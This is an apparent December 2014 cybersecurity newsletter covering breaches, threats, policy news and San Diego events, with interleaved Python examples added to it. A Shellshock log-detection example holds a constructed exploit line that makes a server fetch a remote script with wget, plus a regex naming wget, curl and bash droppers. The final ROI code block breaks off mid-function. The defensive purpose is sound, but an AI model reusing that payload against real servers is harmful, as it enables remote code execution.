CYBER NEWS TIDBITS FOR U - DECEMBER 2014
Welcome to Cyber News Tidbits 4U! Here are updated news compilations from the Cyber Security Community.

Topic headers (+++):
1 – Security news you can likely use (re: management / opportunity items)
2 – Other items of general FYI / FYSA level interest
3 – Threats / bad news stuff / etc.. and…
4 – SD/SoCAL items of interest / opportunities (send me your SD meetings!)

A couple of Highlights (a couple of items of potentially notable interest / high utility & value… your mileage will vary….)
(Lots happening, so LOTs to be aware of. Takes 5 min to skim… then pick out a topic or two..)
(Some great topics / meetings here in SD… scroll to bottom and get engaged)

+++ Some highlights of the week +++

DEC 30

Since it’s New Year’s… got to have predictions…

Cybersecurity hindsight and a look ahead at 2015
This year we witnessed a series of high-profile security breaches, from the aftermath of the Target and Home Depot fiascos, to a number of attacks on other national retailers, including Michaels, Goodwill and Neiman Marcus. Then there was the massive breach at JP Morgan Chase, which compromised personal information of more than 83 million households and businesses, and finally over 100 terabytes of internal files and films recently stolen from Sony. Nobody was safe in 2014. In addition to large retailers, media companies and financial institutions, technology companies like eBay and Snapchat were hacked, too, and so were government organizations and healthcare institutions. Also this year, massive Internet infrastructure vulnerabilities were discovered, including Shellshock, Heartbleed and POODLE.

AND another – Proofpoint cybersecurity predictions for 2015 – Let’s just FIX what we know is broken!!

Top Data Breaches of 2014 – SONY is but ONE (and a call to cyber arms…)
If the top breaches of 2014 taught the security world anything, it’s that size and sector don’t matter – all organizations are vulnerable.
This infographic looks at the top incidents and the lessons security leaders took away from them.

Lessons Learned from Data Breaches – BUT did we – really???

Timeline of cyber attacks and data breaches in 2014

Sony’s Wake Up Call for Cybersecurity – MAYBE???
How corporate executives may respond to the Sony Hack.. if they actually get the gravity now…

Cyber and Privacy turmoil abounds… WHAT TO DO – the CISO Fundamentals
All these hacks, leaks, breaches – more ‘admiring the problem / threat’ – spreading more “FUD” and not so much DOING cyber – so where are the affordable mitigation recommendations? With breaches continuing to increase as well as cybercrime overall, and thus financial and business losses increasing too, organizations need to take a more effective enterprise risk management approach to cyber security and protecting privacy. So what are the ‘due diligence’ cyber steps needed, that we can afford? Gary and I developed a two-page “CISO Fundamentals” paper to help quantify what that entails. Take a quick peek and let us know what else you think is needed.

The first polymorphic ransomware emerges, spreads on its own – SCARY STUFF!!
A new step in the evolution of ransomware has been documented by security researchers who discovered a sample that encrypts the files on the storage unit and creates unique instances of itself due to its polymorphic feature. This threat has been named VirRansom and VirLock by researchers from Sophos and ESET, respectively, in order to convey both its virus side and its desktop-locking, ransomware side. However, unlike the usual crypto-malware, this one allows decryption of the files, but it won’t stop locking the screen, thus forcing the victim to pay.

And the Winner for the Most Hacked Sector for 2014 is … Health and Medical

How much does that cost???
Data Breach Cost Calculator

2014 is ending, but this wave of technology disruptions is just beginning
Changes in technology are happening at a scale which was unimaginable before and will cause disruption in industry after industry. This has really begun to worry me, because we are not ready for this change and most of our leading companies won’t exist 15–20 years from now. Here are five sectors to keep an eye on.

DARPA’s Autonomous Microdrones Designed to Enter Houses
And you thought those pesky quad-copters were an invasion of privacy, a perfect terrorist’s tool…;-((

IoT & Marketing in 2015: 3 Ways Marketers Will Rethink Big Data

What 2015 Holds for Cybersecurity Stocks — HD, JPM, EBAY, SNE, CSCO

+++ Cyber Security News you can use +++

Apple Issues First Automatic Update (what does this tell you… on several fronts!!!)
Apple has pushed out its first automated update. The fix addresses flaws in the Mac OS X network time protocol (NTP) component. Apple has had the capability to push out fixes for several years, but this is the first time it has actually used the service. The vulnerability fixed in this patch lies in the NTP service that OS X uses to keep system clocks in sync.

Will CDM finally be ‘the realization of IT security’?
For more than a decade, the federal government has been moving from a periodic, compliance-based approach to IT security to real-time awareness based on the continuous monitoring of IT systems and networks. While progress has been spotty so far, some security watchers say Phase 2 of the Homeland Security Department’s Continuous Diagnostics and Mitigation program, expected to be implemented in 2015, could be a major step forward. Jeff Wagner, director of security operations for the Office of Personnel Management, said Phase 2 could be “the realization of IT security.”

NSA Releases 12 Years Worth of Internal Reports
The US National Security Agency (NSA) made public 12 years worth of internal reports for the President’s Intelligence Oversight Board.
Even so, the reports indicate that the NSA conducted illegal surveillance with mild or no consequences. The reports, which are heavily redacted, were released in response to a Freedom of Information Act (FOIA) lawsuit brought by the American Civil Liberties Union (ACLU).

Cybersecurity Firm Identifies Six In Sony Hack – one a former employee – do you have a tight process to delete ALL of a terminated employee’s access???

Security in 2015: Will you care about the next big breach?

Breaches should reignite push for better cyber hygiene — YES!!!
While it is debatable as to whether or not companies like USIS or KeyPoint had sufficient internal cybersecurity controls in place to mitigate the breaches, what’s clear is that most contracting vehicles are outdated and ill-suited for the cyber challenges of today.

Congress is urged to make key decisions on commercial drones
The Obama administration is on the verge of proposing long-awaited rules for commercial drone operations in U.S. skies, but key decisions on how much access to grant drones are likely to come from Congress next year.

Insider Threats a Major Concern for Businesses (this should be obvious to all by now)

NIST Cybersecurity Framework infographic… how it all integrates..

Snowden Documents Show How Well NSA Codebreakers Can Pry

Security and the Rise of Machine-to-Machine (M2M) Communications (IoE & IoT)

10 Top Challenges Industrial IoT Must Overcome in 2015

2015 CISO Wish List and New Year Resolutions – AND SO.. quit wishing for stuff and DO the CISO fundamentals!!!

Smartwatch Hacked, how to access data exchanged with Smartphone

‘Farcing’ overtaking ‘phishing’ as online identity theft threat

Pew Research Center: The future of privacy – VERY IN-DEPTH review!!

+++ FYI / FYSA +++

Sony hack: Is Congress next?
Government agencies and congressional offices are vulnerable to the same kind of cyberattack that hit Sony Pictures, experts say.
Lawmakers on Capitol Hill are well aware of the growing threat online, and many tell staff to act as if everything they write in email could one day become public. “I try to inspire my staff often that when they write an email, they write it as if it should be right on the front page of your newspaper,” said Rep. Brad Sherman (D-Calif.), whose district includes Hollywood, in an interview with The Hill.

Obama signs 5 cybersecurity bills
Without ceremony, President Obama on Dec. 18 signed five cybersecurity-related bills, including legislation to update the Federal Information Security Management Act, the law that governs federal government IT security. It’s the first time in 12 years that significant cybersecurity legislation has become law. The last major piece of cybersecurity law to be passed by Congress and signed by a president was the E-Government Act of 2002, which included FISMA.

German researchers discover a flaw that could let anyone listen to your cell calls
German researchers have discovered security flaws that could let hackers, spies and criminals listen to private phone calls and intercept text messages on a potentially massive scale – even when cellular networks are using the most advanced encryption now available. The flaws, to be reported at a hacker conference in Hamburg this month, are the latest evidence of widespread insecurity on SS7, the global network that allows the world’s cellular carriers to route calls, texts and other services to each other. Experts say it’s increasingly clear that SS7, first designed in the 1980s, is riddled with serious vulnerabilities that undermine the privacy of the world’s billions of cellular customers.

Attack on German Steel Factory System Caused “Massive Damage”
Attackers breached the security of a German steel mill’s network and caused considerable damage by manipulating the controls of a blast furnace.
The attackers gained an initial foothold in the network through a phishing email, and from there were able to make their way into the plant’s production network. The attack was disclosed in the annual report of the German Federal Office for Information Security.
[Note: Another bad example of weak reusable passwords used for very sensitive access. Many other security failures here, but the root cause of so many breaches traces back to the use of reusable passwords and the ease of compromise, whether via phishing or eavesdropping or keystroke capture malware…. This is a classic example of the air-gap mythology that endures in industrial control system environments. Most companies in these historically non-technology based critical infrastructure industries continue to operate as if they don’t need to be concerned about cybersecurity, when in fact they should be more concerned than the companies whose greatest fear is simply losing data. And – they need to re-evaluate their architecture to ensure physical separation of IT and OT.]

FIRST LOOK at Australian Signals Directorate Cloud Computing Security for Tenants guidelines:
In general, the Australian Cyber Security Centre has put together a “Critical Security Controls”-like look at the most important security processes to examine when considering a cloud service provider. There are several recommendations that are meaningful/doable and rightly prioritized (like “choose a CSP that has been assessed, yearly test incident response, protect authentication credentials, tokenize data, etc.). There is a sensible differentiation between what security issues are most relevant to Software as a Service vs. Infrastructure as a Service, etc. The CSP version is pretty much just the Tenant document with the syntax changed such that an auditor looks to see that the Tenant recommendations were followed.
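The steel-mill note above makes the architectural point (a phished IT workstation must not be able to reach the production network) but does not show how to check for it. The following is an added example, not code from the newsletter or from the BSI report: a small linter over a firewall rule list that flags any rule allowing a corporate IT zone to reach the plant-control zone directly, and any broker rule that is wide open. The zone names, the rule format and both rulesets are constructed for illustration; the "before" set is what a flat IT/OT network looks like, the "after" set forces all access through a jump host in an OT DMZ.

```python
"""
Policy check: flag firewall rules that let corporate IT zones reach the OT
(plant/ICS) zone directly instead of via a brokered jump host in a DMZ.
Added example; zone names, rule format and sample rulesets are constructed.
"""
from dataclasses import dataclass

IT_ZONES = {"corp-users", "corp-servers"}   # assumed corporate zone names
OT_ZONE = "plant-control"                   # assumed control-system zone
BROKER_ZONE = "ot-dmz"                      # assumed DMZ holding the jump host


@dataclass(frozen=True)
class Rule:
    src: str
    dst: str
    proto: str
    port: str        # "any" or a port number as a string
    action: str      # "allow" or "deny"


def parse_rules(text):
    """Parse 'src dst proto port action' lines; '#' starts a comment."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        src, dst, proto, port, action = line.split()
        rules.append(Rule(src, dst, proto, port, action.lower()))
    return rules


def direct_it_to_ot_rules(rules):
    """Rules that allow any IT zone (or 'any') straight into the OT zone."""
    return [r for r in rules
            if r.action == "allow" and r.dst == OT_ZONE
            and (r.src in IT_ZONES or r.src == "any")]


def broad_broker_rules(rules):
    """Broker rules wider than one jump-host service: an 'any' protocol or
    port from the DMZ into OT gives a compromised jump host the whole plant."""
    return [r for r in rules
            if r.action == "allow" and r.dst == OT_ZONE
            and r.src == BROKER_ZONE and (r.proto == "any" or r.port == "any")]


def assess(text):
    """Return human-readable findings for a ruleset (empty list = clean)."""
    rules = parse_rules(text)
    findings = []
    for r in direct_it_to_ot_rules(rules):
        findings.append(f"direct IT->OT path: {r.src} -> {r.dst} {r.proto}/{r.port}")
    for r in broad_broker_rules(rules):
        findings.append(f"over-broad broker rule: {r.src} -> {r.dst} {r.proto}/{r.port}")
    return findings


# Constructed "before" ruleset: engineering workstations talk straight to the
# PLC/HMI segment, so a phished workstation inherits that reach.
WEAK_POLICY = """
corp-users     plant-control  tcp  any   allow   # engineers RDP/HMI direct
corp-servers   plant-control  tcp  502   allow   # historian polls Modbus
any            any            any  any   deny
"""

# Constructed "after" ruleset: IT reaches only a jump host in the DMZ, and only
# the jump host, on a fixed port, may talk into the control zone; the
# historian data flows outward from OT into a DMZ mirror instead.
HARDENED_POLICY = """
corp-users     ot-dmz         tcp  3389  allow   # RDP to jump host only
ot-dmz         plant-control  tcp  3389  allow   # jump host -> HMI
plant-control  ot-dmz         tcp  502   allow   # OT pushes to DMZ historian
any            any            any  any   deny
"""

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, assess(policy) or ["no findings"])
```

The check is deliberately coarse: it reads zones, not addresses, because the question the steel-mill case raises is whether a path exists at all, not whether it is rate-limited or logged. A real deployment would feed it the exported policy of the actual firewall between the two networks.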
Watchdog says Secret Service misses the bar on cybersecurity
The Secret Service, no stranger to security lapses, is being dinged by an internal auditor for not requiring two-step verification to access agency networks and for ignoring government-wide rules for continuously monitoring network security. For the past year, the Department of Homeland Security subdivision has refused to digitally report data about cyber defenses, according to a new inspector general report. DHS, which Congress last week designated the point agency on cybersecurity, is in charge of the federal continuous monitoring initiative. The department’s inability to get its own agency to fall in line could raise questions about the enlargement of Homeland Security’s cyber authorities.

Chinese Android phone maker hides secret backdoor in its devices
Chinese smartphone maker Coolpad has built an extensive “backdoor” into its Android devices that can track users, serve them unwanted advertisements and install unauthorized apps, a U.S. security firm alleged today. In a research paper released today, Palo Alto Networks detailed its investigation of the backdoor, which it dubbed “CoolReaper.” “Coolpad has built a backdoor that goes beyond the usual data collection,” said Ryan Olson, director of intelligence at Palo Alto’s Unit 42. “This is way beyond what one malicious insider could have done.”

China is reportedly blocking access to Gmail inside the country.
China began blocking various Google services in 2009 and started blocking Gmail access earlier this year. Users have been seeking third-party email clients to access their accounts, and now those have been blocked as well. The only way to access Gmail in China now is through virtual private networks (VPNs).

2014: The year cyber danger doubled
As we look back at cyber topics in 2014, don’t be surprised if you are seeing double. This has been a year when cybersecurity stories doubled in breadth, depth and width of societal influence.
As the Internet has expanded into every area of life, the opportunities have grown dramatically – but so have the challenges with the ‘dark side’ of the Internet.

Heartbleed, Shellshock, Tor and more: The 13 biggest security stories of 2014
The security of the web itself was tested in unprecedented ways in 2014 – but the news isn’t all bad.

US Justice Dept. Establishes New Cyber Security Unit
A new unit operating under the US Department of Justice’s (DoJ’s) Computer Crime and Intellectual Property division will provide legal advice for cyber crime investigations worldwide. The unit will concentrate on proactive considerations to help reduce the likelihood of attacks.

‘Data Integration for Dummies’ (eBook)

Making Security Measurable – Application Security

Making Security Measurable – Software Assurance

8 ways mobile will get your attention in 2015

Hackers hit a poorly configured server to breach JPMorgan
Weak hygiene and access control… THE cause of 95% of all security incidents…;-(( So when will folks make this job one???

An ‘Hour of Code’? How About 5 Minutes for Security?

The Future of Cybersecurity Jobs

Tracking Moving Targets: Exploit Kits and CVEs

FBI: The Top 3 Ways Congress Could Help Fight Tenacious Cyber Threats
Demarest suggested three ways Congress could help evolve with cyber threats.

+++ THREATs / bad news stuff / etc +++

The Coolest Hacks Of 2014
TSA baggage scanners, evil USB sticks, and smart homes were among the targets in some of the most creative — and yes, scary — hacks this year by security researchers.
A weaponized PLC…. Cheating TSA’s carry-on baggage scanners… Hacking satellite ground terminals by air, sea, land… Smart home devices not so savvy… Crashing the vehicle traffic control system… One bad-ass USB…. A worm in your NAS…

U.S. puts new focus on fortifying cyber defenses
The Obama administration is increasingly concerned about a wave of digital extortion copycats in the aftermath of the cyberattack on Sony Pictures Entertainment, as the government and companies try to navigate unfamiliar territory to fortify defenses against further breaches. About 300 theaters on Thursday screened the movie that apparently triggered the hacking attack, a comedy about the assassination of North Korean leader Kim Jong Un, after Sony reversed its initial decision to acquiesce to hacker demands that the film be shelved.

For North Korea’s cyber army, long-term target may be telecoms, utility grids
The hacking attack on Sony Pictures may have been a practice run for North Korea’s elite cyber-army in a long-term goal of being able to cripple telecoms and energy grids in rival nations, defectors from the isolated state said. Non-conventional capabilities like cyber-warfare and nuclear technology are the weapons of choice for the impoverished North to match its main enemies, they said. Obsessed by fears that it will be over-run by South Korea and the United States, North Korea has been working for years on the ability to disrupt or destroy computer systems that control vital public services such as telecoms and energy utilities, according to one defector.

Misfortune Cookie flaw puts 12 million routers at risk
Researchers at the security software company Check Point say they’ve discovered a serious vulnerability lurking inside the routers and modems used to deliver Internet connectivity to 12 million homes and small businesses around the world, and it’s going to be a complicated matter to fix it. Dubbed the Misfortune Cookie, the weakness is present in cable and DSL modems from well-known manufacturers like D-Link, Huawei and ZTE, and could allow a malicious hacker to hijack them and attack connected computers, phones and tablets.
An attacker exploiting Misfortune Cookie could also monitor a vulnerable Internet connection, stealing passwords, business data or other information.

ICANN e-mail accounts, zone database breached in spearphishing attack
Unknown attackers used a spearphishing campaign to compromise sensitive systems operated by the Internet Corporation for Assigned Names and Numbers (ICANN), a coup that allowed them to take control of employee e-mail accounts and access personal information of people doing business with the group. ICANN, which oversees the Internet’s address system, said in a release published Tuesday that the breach also gave attackers administrative access to all files stored in its centralized zone data system, as well as the names, postal addresses, e-mail addresses, fax and phone numbers, user names, and cryptographically hashed passwords of account holders who used the system.

Russian Group Stole Millions from Banks
A cyber crime group has been targeting banks, payment systems, and retail companies in Russia and countries that were once part of the Soviet Union. Known as Anunak, the group stole funds, credit card data, and intellectual property. They stole from cash machine networks, which means the funds are being stolen from the banks and not from customers’ accounts. In all, the group has stolen more than US $25 million.

Xbox Live, PlayStation Network Target of DDoS Attacks
Last week, users found they were unable to log into the PlayStation Network and Xbox Live; Sony says the problems were caused by distributed denial-of-service (DDoS) attacks. The trouble began on the evening of December 24. As of Sunday, December 28, the PlayStation Network is back online. The FBI is reportedly investigating the attacks.
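Shellshock comes up three times in this issue (the year-in-review items and the "worm in your NAS" entry above, and the NAS worm item in the threats section further down), and the common thread is exploitation over HTTP against CGI handlers. The following is an added example, not code from any of the linked articles: detection logic that scans web-server access log lines for the Shellshock trigger string in the request line, Referer or User-Agent, and notes whether the payload carries a download stage. The Apache combined log format is assumed, and the four log lines are constructed, not captures from the incidents described.

```python
"""
Detection: flag Shellshock exploitation attempts in web-server access logs.
Added example; the log lines below are constructed, and the combined log
format is an assumption about the server being monitored.
"""
import re

# The trigger: an env value starting with a function definition "() {" and a
# command after the closing brace. Any header the CGI handler exports into the
# environment (User-Agent, Referer, Cookie, ...) can carry it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Download/execute stages seen in real payloads; used to rate severity only.
DROPPER_RE = re.compile(r"(wget |curl |perl |python |bash -c|/bin/sh)")

# Apache "combined" format; quoted fields may contain backslash-escaped quotes.
_Q = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>' + _Q + r')" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>' + _Q + r')" "(?P<ua>' + _Q + r')"'
)


def scan_line(line):
    """Return a finding dict if the line carries a Shellshock probe, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.group("req")
    path = req.split(" ")[1] if " " in req else req
    for field in ("req", "ref", "ua"):
        val = m.group(field)
        if SHELLSHOCK_RE.search(val):
            return {
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "field": field,
                "path": path,
                "status": int(m.group("status")),
                "has_dropper": bool(DROPPER_RE.search(val)),
            }
    return None


def scan(lines):
    """Scan an iterable of log lines; returns the list of findings in order."""
    return [f for f in (scan_line(l) for l in lines) if f]


# Constructed sample: two probes against a CGI script (the first with a wget
# stage), one benign request, and one request whose braces are not a probe.
SAMPLE_LOG = r'''
203.0.113.7 - - [26/Dec/2014:03:14:07 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.9/x.sh -O /tmp/x.sh\""
203.0.113.7 - - [26/Dec/2014:03:14:09 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 500 0 "() { :; }; echo vulnerable" "Mozilla/5.0"
198.51.100.23 - - [26/Dec/2014:03:15:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1)"
198.51.100.24 - - [26/Dec/2014:03:15:02 +0000] "GET /api?q={a:1} HTTP/1.1" 200 64 "-" "curl/7.38.0"
'''.strip().splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Two caveats a practitioner would add: a 200 or 500 status says nothing about whether the payload ran (the echo probe in line two is a reconnaissance pattern, not a compromise), and the pattern only sees headers the server logs, so a Cookie-borne payload needs a log format that records it.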
Security boot kits past present future (eBOOK)
A history of these malware tools, and what the future might bring…

10 deadliest differences of state-sponsored attacks

+++ SD/SoCAL security events / opportunities +++

CyberTECH events / networking / startups / etc — THE cyber happening place in SD!!! Join their Meetup Group for the latest event information!

The definition of “Cyber KEWEL”

Webster University’s new SD cyber security program – check it out..

JAN
15 – OWASP – Running InfoSec for America’s Finest City.. Gary Hayslip, CISO for the city of San Diego
15 – IoT Startup Table Breakfast
28 – International Data Privacy Day
   A – “Securing the IoT Privacy masters” by CyberTECH, SOeC, others – all day event
   B – Data Privacy Day – NCSA and Morrison & Foerster LLP – all day event
30 – Cross Border cyber opportunities – MX/TJ and CA/SD collaboration event, all day Friday!!! (Hosted at Coleman University) – Contact me to join in… introduction email and agenda at:
31 – “BigDataDay 4 SD” all-day event SAT – free – Jump in and help us – speak and make it great for all! WE went to the one in LA and it was great… our three tracks will be: (1) Technical = Hadoop / HBase / NoSQL; (2) Data science = predictive analytics, parallel algorithms, statistical modeling, algorithms for data mining, etc; and (3) Applications = key use cases… Privacy by Design / data security, data start-ups / incubators, novel products. Contact me to join in… introduction email and agenda at:

FEB
8-11 – NDSS Symposium 2015
10-12 – AFCEA West – Focused on Operations in the Asia-Pacific Region

++ Future events in planning FYI:
25-26 Apr – CYBERWEST: The Southwest Cybersecurity Summit (Phoenix AZ)
4-12 May – SANS Security West 2015
18-21 Jul – Esri National Security Summit
TBD – Provided by IEEE Cyber SIG / Various Security groups – all day Privacy by Design workshop – a cyber model & why you must be part of this initiative!
(at Coleman University – AM Technical approach… PM public discussions)
Help move SD forward in cyber – DOING security vs admiring the problem…. SO engage and help out on Cyber 4 PbD!!!

++ Join our PbD / data security meetup, stay tuned into what’s happening..
See our overview Cyber for PbD brief at
AND our more detailed technical paper on our Cyber 4 PbD approach, including an executable, proposed open privacy framework within an enterprise architecture, is at (this rough draft was published in a major IEEE magazine this month):

————————————————————————————

DEC 21

YES, the SONY hack (security and IP disaster) is all over the news, with even the president getting engaged. One might think this will motivate companies to finally get serious on Cyber security… MAYBE.. a few links to that:

Hackers’ threats prompt Sony Pictures to shelve Christmas release of ‘The Interview’
Sony Pictures Entertainment on Wednesday canceled the Christmas Day release of “The Interview,” bowing to threats of a wide-scale attack from hackers who U.S. intelligence officials have concluded were working for North Korea. U.S. officials, though, were not prepared to publicly accuse the reclusive government, in large part because the Obama administration has not determined what, if any, action it could take. Intelligence officials believe with “99 percent certainty” that hackers working for the North Korean government carried out the attack.

Guardians of Peace, claiming responsibility for the devastating hacking attack against Sony, offered to selectively hold back on releasing email correspondence of its employees, provided that they write in and ask.

Not everyone agrees that the Sony Pictures attack emanated from North Korea.
Attribution for cyber attacks is difficult. Attackers can use proxies and phony IP addresses, and they can plant false clues inside the code of their malware. The initial attack appears to have been financially motivated. The film was not mentioned until later in the chain of events.
How Much Will Scrapping ‘The Interview’ Cost Sony? – estimated $90 million financial hit

Some GREAT events in late January in SD.. with four all-day venues for national privacy day (2), big data / predictive analytics, and a very cool cross border cyber opportunities event (see details at the end of the email)

The Top 10 Privacy Law Stories of 2014
From China to California to the EU; starring giants of the leisure industry, the tech industry and global governments, and encompassing battles over personal freedoms and government overreach – these are the Privacy Tracker stories that made sure nobody in privacy could nap on the job.

Cloud Predictions For 2015

Cisco sees a data analytics fortune at the edge of the network

Agencies Mold Regulations around ‘Voluntary’ Cyber Standards

SANS 20 Critical Controls for Effective Cyber Defense Helper Kit (EXCELLENT TOOL / spreadsheet!!!) (note 10 MB)

One Simple Presentation Shows How Public Is Your Private Information

Top Treasury Official’s Speech Urges Adoption of Cyber Risk Insurance

Big Data Market Projected to Reach $76 Billion by 2020

U.S. Federal Cybersecurity Market Forecast 2015-2020
With a cumulative market valued at $65.5 billion (2015 – 2020), the U.S. Federal Cybersecurity market will grow steadily at about 6.2% CAGR.

SIX technologies that will change PCs in 2015

+++ Cyber Security News you can use +++

FireEye predictions for cybersecurity in 2015
Sony is still smarting over a cataclysmic cyberattack, US banks, Target and Staples have all been targeted, and it seems hackers are always one step ahead. But what can we expect from next year? Security flaws Heartbleed, Cryptolocker and Shellshock have all had their time in the media spotlight, companies are reviewing their risk management and damage control processes, and investment is being pumped into training the next generation of cybersecurity experts in an attempt to keep corporate network intrusion to a minimum.
Mobile and Web-based viruses remain a scourge, and hardly a week goes by without hearing of another data breach or a new strain of malware being discovered in the wild. According to Greg Day, CTO of the EMEA region at security firm FireEye, these situations are likely to deepen and worsen over the coming year and into 2015.

Cyber-espionage expected to surge in 2015: McAfee Labs’ annual threats predictions report for the coming new year.

Annual Cybercrimes Report of 2014 – Stats & Top 15 Hack Cases

2014 in security: The biggest hacks, leaks, and data breaches

Employees Remain the Biggest Risk for Critical Data Loss

10 Top Information Security Threats for the Next Two Years

Expert Internet Security Predictions for 2015

2015 Predictions: The Year of Alternatives

Global Information Security Survey 2014 (infograph)

Apps, not malware, should be your biggest mobile concern
Network security would be relatively simple if it weren’t for end users. But just when IT staff are feeling like they are getting network security somewhat under control, employees and bosses alike are demanding access from a dizzying array of mobile devices running on a variety of operating systems. NowSecure, until recently known as viaForensics, is taking an unusual two-pronged strategy to mobile security that focuses on enforcing security from the center while informing users about security risks at the end points of their mobile devices.

Hackers are getting personal information easier than before
In the mobile app world, when hackers want access to personal information, they need simply ask. This is one of several key findings Symantec Corp. released today as part of the company’s “Mobile App Security” study. The study found that many are willing to forego privacy in exchange for free entertainment.

New York Financial Institutions Will be Evaluated on Cyber Security (MORE will follow suit!!!)
The Superintendent of New York’s Department of Financial Services has asked member organizations to consider cyber security “an integral aspect of their overall risk management strategy” instead of an issue for just information technology. Banks and other financial institutions in New York will be evaluated on their cyber security, including their use of multi-factor authentication and identity and access management. The requirements affect all financial institutions operating with a New York state charter or license.

Agencies Encourage Adoption of Cyber Security Standards
Government agencies have begun encouraging industries that they oversee to adopt applicable cyber security guidelines from the US National Institute of Standards and Technology (NIST). While the standards in the guidelines are voluntary, there is a possibility that they could become mandatory. NIST published the voluntary standards as part of the Framework for Improving Critical Infrastructure Cybersecurity.

Dude, Where’s My Security ROI?
Great stab at quantifying cyber worth.. Yet the ALE… etc.. still have fuzzy math.. rare events with possibly huge impacts.. (rather like dividing by zero)… so the model must be explained to non-technical folks.. And of course improving cyber hygiene and access control is essentially free.. Also.. need to transfer risk.. cyber insurance.. might be a better buy..

IT Security is NOT Rocket Science
He re-states many good points. 90+% of all security incidents are from lack of cyber hygiene and weak access control.. period!!! All items you must do anyway.. thus little to no added cost.. Yet few DO the security basics..

The SONY cyber attack was a sophisticated operation – so sophisticated, officials say, that the same attack could have made it through the defenses of almost any large organization, including the ones currently deployed by federal agencies. YET – the malware used was unsophisticated and riddled with bugs.
However, it did what it was supposed to do; the malware’s purpose did not require complex code. The malware’s construction does indicate a familiarity with the Sony Pictures network.

Former NSA Insider: More Sony-Like Hacks A Given As Corporations Still Weak On Cybersecurity

Sony hack: How cybercrime just got even more complicated

BitTorrent’s Offer To Sony: Release “The Interview” Safely Online With Us And Make Money

Breach insurance might not cover losses at Sony Pictures

This Little USB Necklace Hacks Your Computer In No Time Flat

DoD allows vetted commercial cloud services for sensitive unclassified data, updated guidance

CISO Assessment: For Security Leaders, a Stronger Voice

Cybersecurity & Cyber Defense

Implementing the 20 Critical Controls on a Low-Cost Budget: Do It, Don’t Worry About It!

Demand for cyber security professionals higher than ever before

NSA AURORAGOLD spies on any wireless network, anywhere

Ready Technology Trends

Trends to Watch in 2015: From Algorithmic Accountability to the Uber of X

+++ FYI / FYSA +++

NIST revises guide on security controls
New guidance published by the National Institute of Standards and Technology is aimed at helping federal agencies and other organizations in and out of government assess proper security and privacy controls, especially those tied to the continuous monitoring of IT systems for vulnerabilities. NIST unveiled on Dec. 15 Special Publication 800-53A Revision 4, “Assessing Security and Privacy Controls in Federal Information Systems and Organizations,” which supplements SP 800-53 Rev 4, “Security and Privacy Controls for Federal Information Systems and Organizations,” published in April 2013.

Price tag rises for stolen identities sold in the underground
One year after the cybercrime underground slashed the price of a stolen identity by as much as 37% due to a glut in the black market, the price tag for a pilfered ID has inched upward again.
Researchers at Dell SecureWorks published their latest report on the underground hacker market today. Counterfeit identities are the new hot product to support fraud — new fake identity kits, passports, Social Security numbers, utility bills, and driver’s licenses. A new identity, including a working SSN, name, and address, goes for $250, and for an additional $100, you can get a utility bill for ID verification purposes when perpetrating fraud, the researchers found.

Cybersecurity codes now attached to jobs government-wide
Every position in the federal workforce now has a cybersecurity job code listed in its description for more effective tracking of the lagging cyber workforce, even if the job isn’t cybersecurity-related.

Cyberattacks longer, more continuous than before
Companies hit with cyberattacks this year spent a longer time on average mitigating the threat than at any time previously, highlighting the growing sophistication and complexity of the threat landscape.

Real-life ‘Criminal Minds’ team tries to root out rogue federal employees
The term ‘insider threat’ describes everything from government employees who snap on the job and commit violence to those who leak national secrets. But researchers say using technology to detect otherwise hidden behavioral patterns could help federal managers screen out mischief-makers of all stripes. Moreover, they could do so within the bounds of privacy.

Dutch Privacy Watchdog Hounds Google and Facebook
The Dutch data protection authority College Bescherming Persoonsgegevens (CBP) has ordered Google to abide by that country’s privacy rules or be subject to penalties of as much as 15 million euros (US $18.4 million). Google has been using user data to offer targeted advertising. The watchdog group has also turned its attention to Facebook, launching an investigation into that company’s new privacy policy, which is scheduled to take effect on January 1, 2015.
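The "Security ROI" item above argues that ALE-style arithmetic goes fuzzy when the loss is a rare event with a huge impact. The following is an added example, not code from that article or from the Data Breach Cost Calculator linked earlier: it carries the standard formulas through (ALE = SLE x ARO, and return on security investment as the ALE reduction net of the control's cost), then runs a Monte Carlo simulation with a Poisson incident count and a lognormal per-incident loss to show why a single expected-value figure misleads non-technical readers. Every dollar figure, rate and distribution parameter is constructed for illustration; the dividing-by-zero point is visible in the output as a typical year that costs nothing and a bad year that costs several times the "expected" loss.

```python
"""
Security ROI arithmetic (ALE, ROSI) plus a Monte Carlo view of why the point
estimate hides the shape of a rare, heavy-tailed loss.
Added example; all figures, rates and distribution parameters are constructed.
"""
import math
import random
import statistics


def ale(sle, aro):
    """Annualized loss expectancy: single-loss expectancy x annual rate of occurrence."""
    return sle * aro


def rosi(ale_before, ale_after, control_cost):
    """Return on security investment as a multiple of the control's annual cost:
    (loss avoided - cost of control) / cost of control."""
    return (ale_before - ale_after - control_cost) / control_cost


def simulate_annual_losses(years, aro, median_loss, sigma, seed=2014):
    """Monte Carlo: Poisson(aro) incidents per year, each costing a lognormal
    amount with the given median and shape (sigma). Returns yearly totals."""
    rng = random.Random(seed)            # fixed seed: deterministic output
    mu = math.log(median_loss)           # lognormal median = exp(mu)
    totals = []
    for _ in range(years):
        # Poisson count by inverse transform (adequate for small aro)
        n, p, threshold = 0, 1.0, math.exp(-aro)
        while True:
            p *= rng.random()
            if p < threshold:
                break
            n += 1
        totals.append(sum(rng.lognormvariate(mu, sigma) for _ in range(n)))
    return totals


def summarize(totals):
    """Mean (what ALE estimates), median (the typical year), 95th percentile
    (the bad year), and the share of years with no loss at all."""
    s = sorted(totals)
    return {
        "mean": statistics.mean(s),
        "median": statistics.median(s),
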